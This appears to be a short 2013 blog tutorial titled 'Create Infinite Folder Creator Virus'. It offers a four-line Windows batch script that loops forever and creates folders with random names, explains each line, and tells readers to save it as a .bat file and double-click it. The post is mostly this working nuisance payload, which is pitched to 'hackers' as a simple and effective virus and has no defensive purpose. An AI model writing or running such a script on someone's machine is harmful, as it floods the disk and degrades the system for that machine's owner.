Batch Programming : Create Infinite Folder Creator Virus

By Unknown Saturday, May 18, 2013 0 comments
create infinite folders

Hello hackers, the batch code will be very helpful to you. Virus code that is simple and effective.

As usual open notebook.
 
Copy this code into Notepad.


@echo off
:top
md %random%
goto top


@ Echo off makes it so that seems to be a blank screen, but in reality they do hundreds of folders.
md % random% is command that creating folders with random names.
goto top - return to label: top, infinite loop

Save the bat file (eg: folderscreate.bat).
That's it, if you double click the file it will create a folder in the batch file the world ends.
Sharing is sexy

Related posts

0 comments for this post

Leave a reply